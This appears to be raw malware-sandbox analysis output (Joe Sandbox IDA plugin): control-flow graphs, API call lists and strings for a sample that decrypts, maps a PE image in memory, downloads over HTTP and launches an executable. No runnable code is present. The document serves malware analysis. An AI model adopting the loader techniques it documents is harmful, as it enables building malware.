4032f3-4032fb 2285->2290 2291 4032fe-40330c 2285->2291 2301 40326c-40326f 2287->2301 2289->2301 2290->2291 2291->2276 2291->2285 2296->2244 2299 403343-40334d 2296->2299 2302 403371-403378 2299->2302 2303 40334f-403358 2299->2303 2301->2263 2304 4033ca-4033e3 call 409a17 2302->2304 2305 40337a-403383 2302->2305 2303->2302 2306 40335a-40335e 2303->2306 2307 4033b4-4033c9 call 409a17 2305->2307 2308 403385-40338e 2305->2308 2306->2302 2309 403360-40336f 2306->2309 2316 403390 2308->2316 2317 40339a-4033b3 call 409a17 2308->2317 2309->2302 2316->2317
                                                        APIs
                                                        • SetLastError.KERNEL32(0000000D), ref: 00402F02
                                                        • SetLastError.KERNEL32(000000C1), ref: 00402F44
                                                        Strings
                                                        • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402FA1
                                                        • ERROR_OUTOFMEMORY!, xrefs: 00403062
                                                        • Size is not valid!, xrefs: 00402F08
                                                        • DOS header size is not valid!, xrefs: 00402F71
                                                        • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402FB3
                                                        • alignedImageSize != AlignValueUp!, xrefs: 0040302C
                                                        • DOS header is not valid!, xrefs: 00402F32
                                                        • Section alignment invalid!, xrefs: 00402FC7
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast
                                                        • String ID: DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
                                                        • API String ID: 1452528299-2436911586
                                                        • Opcode ID: 969231b7725f6e648ae7b53270e343726ac677e9ab86d7066b7749be6261437e
                                                        • Instruction ID: feefb59cb084f329bf9f2ee3fcaf904be4f7c95626e3fbc9d9f9d2488596d2a7
                                                        • Opcode Fuzzy Hash: 969231b7725f6e648ae7b53270e343726ac677e9ab86d7066b7749be6261437e
                                                        • Instruction Fuzzy Hash: C3F1AC71B00205ABCB10CF69D985BAAB7B4BF48705F14407AE909EB6C1D779ED11CB98

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2391 4035d0-403658 CryptAcquireContextW 2392 40371a-403730 GetLastError CryptReleaseContext 2391->2392 2393 40365e-40367c CryptCreateHash 2391->2393 2395 403864-40386a 2392->2395 2393->2392 2394 403682-403695 2393->2394 2396 403698-40369d 2394->2396 2397 403894-4038b1 call 409a17 2395->2397 2398 40386c-403878 2395->2398 2396->2396 2399 40369f-4036e6 call 409b8a call 40fd1f CryptHashData 2396->2399 2401 40388a-403891 call 409b7c 2398->2401 2402 40387a-403888 2398->2402 2415 4036f6-403718 CryptDeriveKey 2399->2415 2416 4036e8-4036f1 GetLastError 2399->2416 2401->2397 2402->2401 2406 4038b2-4038c5 call 40cfef 2402->2406 2413 4038c7-4038ce 2406->2413 2414 4038d8 2406->2414 2413->2414 2420 4038d0-4038d4 2413->2420 2415->2392 2417 403735-403736 call 40fb4d 2415->2417 2416->2395 2421 40373b-403787 call 40aff0 call 409b8a 2417->2421 2420->2414 2426 403858-40385e CryptDestroyKey 2421->2426 2427 40378d-40379c 2421->2427 2426->2395 2428 4037a2-4037ab 2427->2428 2429 4037b9-4037f4 call 40aff0 CryptDecrypt 2428->2429 2430 4037ad-4037af 2428->2430 2429->2426 2433 4037f6-403821 call 40aff0 2429->2433 2430->2429 2433->2426 2436 403823-403852 2433->2436 2436->2426 2436->2428
                                                        APIs
                                                        • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,6CC08CF2), ref: 00403650
                                                        • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403674
                                                        • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004036DE
                                                        • GetLastError.KERNEL32 ref: 004036E8
                                                        • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00403710
                                                        • GetLastError.KERNEL32 ref: 0040371A
                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040372A
                                                        • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004037EC
                                                        • CryptDestroyKey.ADVAPI32(?), ref: 0040385E
                                                        Strings
                                                        • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040362C
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                                                        • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                        • API String ID: 3761881897-63410773
                                                        • Opcode ID: 7cda3253fc6564296fb6cb8a200b00d8bf0f12f9b8f76da2c3a0b6ecf6ba6fe9
                                                        • Instruction ID: 2781db946ec69ebb5a82e2500c6cd73aae13b8bfd69ebbb4ddbc14150c00f762
                                                        • Opcode Fuzzy Hash: 7cda3253fc6564296fb6cb8a200b00d8bf0f12f9b8f76da2c3a0b6ecf6ba6fe9
                                                        • Instruction Fuzzy Hash: DF819F71A00218AFEF209F25CC45B9ABBB9FF49300F1481BAF50DA7291DB359E858F55

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2437 402a50-402a67 2438 402aa9-402abd call 409a17 2437->2438 2439 402a69-402a72 2437->2439 2441 402a74-402a79 2439->2441 2442 402abe-402b00 VirtualProtect 2439->2442 2441->2438 2443 402a7b-402a80 2441->2443 2442->2438 2445 402b02-402b24 GetLastError FormatMessageA 2442->2445 2446 402a82-402a8a 2443->2446 2447 402a96-402aa3 call 402e80 2443->2447 2448 402b27-402b2c 2445->2448 2446->2447 2449 402a8c-402a94 2446->2449 2452 402aa5 2447->2452 2448->2448 2450 402b2e-402b7a LocalAlloc call 4029e0 OutputDebugStringA LocalFree * 2 call 409a17 2448->2450 2449->2447 2451 402aa8 2449->2451 2451->2438 2452->2451
                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 00402AF8
                                                        • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402B0D
                                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402B1B
                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402B36
                                                        • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402B55
                                                        • LocalFree.KERNEL32(00000000), ref: 00402B62
                                                        • LocalFree.KERNEL32(?), ref: 00402B67
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                                                        • String ID: %s: %s$Error protecting memory page
                                                        • API String ID: 839691724-1484484497
                                                        • Opcode ID: 9750dd737f677cfe2bf35afdb918f3e7736876f76d8ddec4ee516f8fc37c3b4c
                                                        • Instruction ID: 7115b4f99f47229cfead79ad45df677009e1c347b6b4b41756aa32ea0cb5f428
                                                        • Opcode Fuzzy Hash: 9750dd737f677cfe2bf35afdb918f3e7736876f76d8ddec4ee516f8fc37c3b4c
                                                        • Instruction Fuzzy Hash: A0311431B00104AFDB10DF58DD45FAAB7A8EF48704F4541BAE905EB2D2DB79AD06CB98

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2631 401970-401a48 InternetSetFilePointer InternetReadFile 2633 401a80-401acd call 40b570 HttpQueryInfoA 2631->2633 2637 401ad3-401b06 CoCreateInstance 2633->2637 2638 401e1a-401e46 call 409a17 2633->2638 2637->2638 2639 401b0c-401b13 2637->2639 2639->2638 2641 401b19-401b36 2639->2641 2643 401b40-401b45 2641->2643 2643->2643 2644 401b47-401c0e call 402760 call 401610 2643->2644 2652 401c10-401c1f 2644->2652 2653 401c3f-401c41 2644->2653 2654 401c21-401c2f 2652->2654 2655 401c35-401c3c call 409b7c 2652->2655 2656 401c47-401c4e 2653->2656 2657 401e0e-401e15 2653->2657 2654->2655 2658 401e49-401e4f call 40cfef 2654->2658 2655->2653 2656->2657 2660 401c54-401cca call 409b8a 2656->2660 2657->2638 2667 401cd0-401ce4 2660->2667 2668 401df4-401e0a call 409a25 2660->2668 2670 401cea-401d19 call 409b8a 2667->2670 2671 401d8e-401da5 2667->2671 2668->2657 2679 401d7a-401d8b call 409a25 2670->2679 2680 401d1b-401d1d 2670->2680 2672 401da7-401da9 2671->2672 2673 401dea-401df2 2671->2673 2677 401db8-401dba 2672->2677 2678 401dab-401db6 call 40d0dd 2672->2678 2673->2668 2682 401dbc-401dcc call 40aff0 2677->2682 2683 401dce-401ddf call 40b570 call 40d0dd 2677->2683 2694 401de5 call 40cfdf 2678->2694 2679->2671 2684 401d35-401d4d call 40b570 2680->2684 2685 401d1f-401d21 2680->2685 2682->2673 2683->2694 2702 401d5c-401d68 2684->2702 2703 401d4f-401d5a call 40d0dd 2684->2703 2685->2684 2691 401d23-401d33 call 40aff0 2685->2691 2691->2679 2694->2673 2702->2679 2705 401d6a-401d6f call 40d0dd 2702->2705 2708 401d75 call 40cfdf 2703->2708 2705->2708 2708->2679
                                                        APIs
                                                        • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401A05
                                                        • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401A28
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileInternet$PointerRead
                                                        • String ID: text
                                                        • API String ID: 3197321146-999008199
                                                        • Opcode ID: 053bcbbc951b0f6e2e3539fc5c0c96396c3859489272e4824dfa28b8d36ca5fc
                                                        • Instruction ID: 56e9ac6e571947bcf275884445d614b5348a2aaf1a2f7cc802118cd3fea156c2
                                                        • Opcode Fuzzy Hash: 053bcbbc951b0f6e2e3539fc5c0c96396c3859489272e4824dfa28b8d36ca5fc
                                                        • Instruction Fuzzy Hash: 10C13970A002189FDB24DF54CC85BE9B7B5EF49304F1041EAE409B72A1DB78AE95CF99
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0478848C
                                                        • Module32First.KERNEL32(00000000,00000224), ref: 047884AC
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025597799.0000000004780000.00000040.00001000.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4780000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 3833638111-0
                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                        • Instruction ID: 5687d654b8fa294670f3295f60f5c255fd154a4ce1b3eb07731fd8e977f7c2eb
                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                        • Instruction Fuzzy Hash: 55F0F632140715AFE7203FF59C8CB6E72E8FF48325F51052CE646952C0DB74F80546A2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID: mixtwo$nosub
                                                        • API String ID: 3472027048-187875987
                                                        • Opcode ID: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
                                                        • Instruction ID: d051705d2d3a1196041d610bae506d61a1e8aa88cf060e84ab2565e50524cdd9
                                                        • Opcode Fuzzy Hash: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
                                                        • Instruction Fuzzy Hash: AAD05286F0420822C00031BE2E0FA1C3A18064262EFA0122AE820226C3B8882A2489EF

                                                        Control-flow Graph

                                                        APIs
                                                        • __EH_prolog3_GS.LIBCMT ref: 1000152A
                                                        • __cftof.LIBCMT ref: 10001624
                                                        • InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 1000163D
                                                        • InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001660
                                                        • InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 10001680
                                                        • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,80400000,00000001), ref: 100016B0
                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 100016C9
                                                        • InternetCloseHandle.WININET(00000000), ref: 100016E0
                                                        • InternetCloseHandle.WININET(00000000), ref: 100016E3
                                                        • InternetCloseHandle.WININET(00000000), ref: 100016E9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSend__cftof
                                                        • String ID: GET$http://
                                                        • API String ID: 1233269984-1632879366
                                                        • Opcode ID: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                                        • Instruction ID: 7cfd31fe4164df5669dc4f011f358c4066a4bf273ac9d15a63e71752a24e0b34
                                                        • Opcode Fuzzy Hash: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                                        • Instruction Fuzzy Hash: D5518F75E01618EBEB11CBE4CC85EEEB7B9EF48340F508114FA11BB189D7B49A45CBA0

                                                        Control-flow Graph

                                                        APIs
                                                        • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018A3
                                                        • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018C9
                                                        • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018EF
                                                          • Part of subcall function 004024A0: Concurrency::cancel_current_task.LIBCPMT ref: 004025C9
                                                        • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401915
                                                        Strings
                                                        • http://, xrefs: 00401EF4, 004021D3
                                                        • GET, xrefs: 004020E7
                                                        • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004018CD
                                                        • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 004018A7
                                                        • text, xrefs: 00401B8F
                                                        • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401862
                                                        • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 004018F3
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                                                        • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$http://$text
                                                        • API String ID: 2146599340-4172842843
                                                        • Opcode ID: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
                                                        • Instruction ID: 7e6d5c8cd7aa1cabae0cdc9af9d1d54ef5f059dc9231cd92a953cd594aab5962
                                                        • Opcode Fuzzy Hash: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
                                                        • Instruction Fuzzy Hash: 05314371E00109EBEB14DBA9CC95FEEB7B9EB08714FA0812AE511735D0C7789945CBA4

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2458 493003c-4930047 2459 4930049 2458->2459 2460 493004c-4930263 call 4930a3f call 4930e0f call 4930d90 VirtualAlloc 2458->2460 2462 493004a 2459->2462 2476 4930265-4930289 call 4930a69 2460->2476 2477 493028b-4930292 2460->2477 2462->2462 2482 49302ce-49303c2 VirtualProtect call 4930cce call 4930ce7 2476->2482 2479 49302a1-49302b0 2477->2479 2481 49302b2-49302cc 2479->2481 2479->2482 2481->2479 2488 49303d1-49303e0 2482->2488 2489 49303e2-4930437 call 4930ce7 2488->2489 2490 4930439-49304b8 VirtualFree 2488->2490 2489->2488 2492 49305f4-49305fe 2490->2492 2493 49304be-49304cd 2490->2493 2496 4930604-493060d 2492->2496 2497 493077f-4930789 2492->2497 2495 49304d3-49304dd 2493->2495 2495->2492 2501 49304e3-4930505 LoadLibraryA 2495->2501 2496->2497 2502 4930613-4930637 2496->2502 2499 49307a6-49307b0 2497->2499 2500 493078b-49307a3 2497->2500 2503 49307b6-49307cb 2499->2503 2504 493086e-49308be LoadLibraryA 2499->2504 2500->2499 2505 4930517-4930520 2501->2505 2506 4930507-4930515 2501->2506 2507 493063e-4930648 2502->2507 2508 49307d2-49307d5 2503->2508 2511 49308c7-49308f9 2504->2511 2509 4930526-4930547 2505->2509 2506->2509 2507->2497 2510 493064e-493065a 2507->2510 2512 49307d7-49307e0 2508->2512 2513 4930824-4930833 2508->2513 2514 493054d-4930550 2509->2514 2510->2497 2515 4930660-493066a 2510->2515 2516 4930902-493091d 2511->2516 2517 49308fb-4930901 2511->2517 2518 49307e2 2512->2518 2519 49307e4-4930822 2512->2519 2523 4930839-493083c 2513->2523 2520 49305e0-49305ef 2514->2520 2521 4930556-493056b 2514->2521 2522 493067a-4930689 2515->2522 2517->2516 2518->2513 2519->2508 2520->2495 2524 493056f-493057a 2521->2524 2525 493056d 2521->2525 2526 4930750-493077a 2522->2526 2527 493068f-49306b2 2522->2527 2523->2504 2528 493083e-4930847 2523->2528 2530 493059b-49305bb 2524->2530 2531 493057c-4930599 2524->2531 2525->2520 2526->2507 2532 49306b4-49306ed 2527->2532 2533 49306ef-49306fc 2527->2533 2534 493084b-493086c 2528->2534 2535 4930849 2528->2535 2542 49305bd-49305db 2530->2542 2531->2542 2532->2533 2536 493074b 2533->2536 2537 49306fe-4930748 2533->2537 2534->2523 2535->2504 2536->2522 2537->2536 2542->2514
                                                        APIs
                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0493024D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4930000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID: cess$kernel32.dll
                                                        • API String ID: 4275171209-1230238691
                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                        • Instruction ID: 08bb6fa7d2181586b89baf2134dc6309017076f57fa03d49e1baa52cb838d437
                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                        • Instruction Fuzzy Hash: DB528974A00229DFDB64CF58C984BACBBB1BF09305F1480E9E94DAB355DB30AA85DF14

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2543 10001175-100011a6 call 1000e8e7 2546 100011a8-100011bd call 1000270d 2543->2546 2547 100011bf 2543->2547 2549 100011c5-100011dd InternetSetFilePointer 2546->2549 2547->2549 2550 100011e3-1000121b InternetReadFile 2549->2550 2552 10001253-1000125a 2550->2552 2553 1000121d-1000124d call 1000270d call 100050e0 call 10002724 2550->2553 2555 10001260-100012a0 call 10003c40 HttpQueryInfoA 2552->2555 2556 1000125c-1000125e 2552->2556 2553->2552 2562 100012a6-100012d2 CoCreateInstance 2555->2562 2563 1000150a-10001520 call 1000e8a5 2555->2563 2556->2550 2556->2555 2562->2563 2566 100012d8-100012df 2562->2566 2566->2563 2569 100012e5-10001316 call 1000184b call 10001006 2566->2569 2574 10001318 2569->2574 2575 1000131a-10001351 call 10001c08 call 10001bb9 2569->2575 2574->2575 2581 10001357-1000135e 2575->2581 2582 100014fe-10001505 2575->2582 2581->2582 2583 10001364-100013cc call 1000270d 2581->2583 2582->2563 2587 100013d2-100013e8 2583->2587 2588 100014e6-100014f9 call 10002724 2583->2588 2589 10001486-10001497 2587->2589 2590 100013ee-1000141d call 1000270d 2587->2590 2588->2582 2593 10001499-1000149b 2589->2593 2594 100014dc-100014e4 2589->2594 2601 1000146e-10001483 call 10002724 2590->2601 2602 1000141f-10001421 2590->2602 2597 100014aa-100014ac 2593->2597 2598 1000149d-100014a8 call 10005926 2593->2598 2594->2588 2599 100014c0-100014d1 call 10003c40 call 10005926 2597->2599 2600 100014ae-100014be call 100050e0 2597->2600 2615 100014d7 call 1000584c 2598->2615 2599->2615 2600->2594 2601->2589 2606 10001423-10001425 2602->2606 2607 10001434-10001447 call 10003c40 2602->2607 2606->2607 2612 10001427-10001432 call 100050e0 2606->2612 2622 10001456-1000145c 2607->2622 2623 10001449-10001454 call 10005926 2607->2623 2612->2601 2615->2594 2622->2601 2624 1000145e-10001463 call 10005926 2622->2624 2628 10001469 call 1000584c 2623->2628 2624->2628 2628->2601
                                                        APIs
                                                        • __EH_prolog3_GS.LIBCMT ref: 1000117F
                                                        • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 100011DD
                                                        • InternetReadFile.WININET(?,?,000003E8,?), ref: 100011FB
                                                        • HttpQueryInfoA.WININET(?,0000001D,?,00000103,00000000), ref: 10001298
                                                        • CoCreateInstance.OLE32(?,00000000,00000001,100111B0,?), ref: 100012CA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: FileInternet$CreateH_prolog3_HttpInfoInstancePointerQueryRead
                                                        • String ID: text
                                                        • API String ID: 1154000607-999008199
                                                        • Opcode ID: a1e379d679c24b6df6bb2eefa12ec4263e14a704e2d288e5f5fa36855e8b81ad
                                                        • Instruction ID: b002d723a568eb8b1b2c33cfea8b8604ab2d7fe63d6740fb25dc42610badb9b0
                                                        • Opcode Fuzzy Hash: a1e379d679c24b6df6bb2eefa12ec4263e14a704e2d288e5f5fa36855e8b81ad
                                                        • Instruction Fuzzy Hash: 62B14975900229AFEB65CF24CC85BDAB7B8FF09355F1041D9E508A7265DB70AE80CF90
                                                        APIs
                                                          • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,6CC08CF2), ref: 00410837
                                                          • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                                                        • Sleep.KERNEL32(000003E8), ref: 00405AB0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: SUB=$get$u%
                                                        • API String ID: 2563648476-4163392738
                                                        • Opcode ID: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
                                                        • Instruction ID: 73809eb16a5d3869ae15fb7337a890a5b139b8f1a0f0395b135ebc5315de088a
                                                        • Opcode Fuzzy Hash: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
                                                        • Instruction Fuzzy Hash: 03326571D001189ACB19FB76C95AAEE73785F14308F10817FF846771D2EE7C6A48CAA9

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 10005956: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10001F48,00000000), ref: 10005969
                                                          • Part of subcall function 10005956: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000599A
                                                        • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1000212B
                                                        • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 10002155
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2026400087.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000001.00000002.2026381008.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026422135.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000001.00000002.2026446263.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                        Similarity
                                                        • API ID: Time$CreateExecuteFileProcessShellSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: .exe$open
                                                        • API String ID: 1627157292-49952409
                                                        • Opcode ID: e7d307bd9b08359f9d4fa667b823f6c82abf28f5e9ce0c80c34beec9c79a4aa9
                                                        • Instruction ID: 97952a91a625a221cb26b3956644a393a6e3da00256d77b8c5daa8cab0653b15
                                                        • Opcode Fuzzy Hash: e7d307bd9b08359f9d4fa667b823f6c82abf28f5e9ce0c80c34beec9c79a4aa9
                                                        • Instruction Fuzzy Hash: 40514B715083809BE724DF64C881EDFB7E8FB95394F004A2EF69986195DB70A944CB62

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 3521 401e50-401e9e 3522 401ea0-401ea5 3521->3522 3522->3522 3523 401ea7-402179 call 402760 * 2 call 40aff0 call 40d0f0 InternetOpenA 3522->3523 3536 4021a3-4021c0 call 409a17 3523->3536 3537 40217b-402187 3523->3537 3538 402199-4021a0 call 409b7c 3537->3538 3539 402189-402197 3537->3539 3538->3536 3539->3538 3541 4021c8-4021f9 call 40cfef call 401e50 3539->3541
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: http://
                                                        • API String ID: 0-1121587658
                                                        • Opcode ID: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
                                                        • Instruction ID: 283a115399ec50033446259c01340d37f537f7c1e1c45d518ea9d7f2bb9a556a
                                                        • Opcode Fuzzy Hash: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
                                                        • Instruction Fuzzy Hash: 11519071E002099FDF14CFA9C985BEEB7B9EB08304F10812EE915B76C1D7796944CB94

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
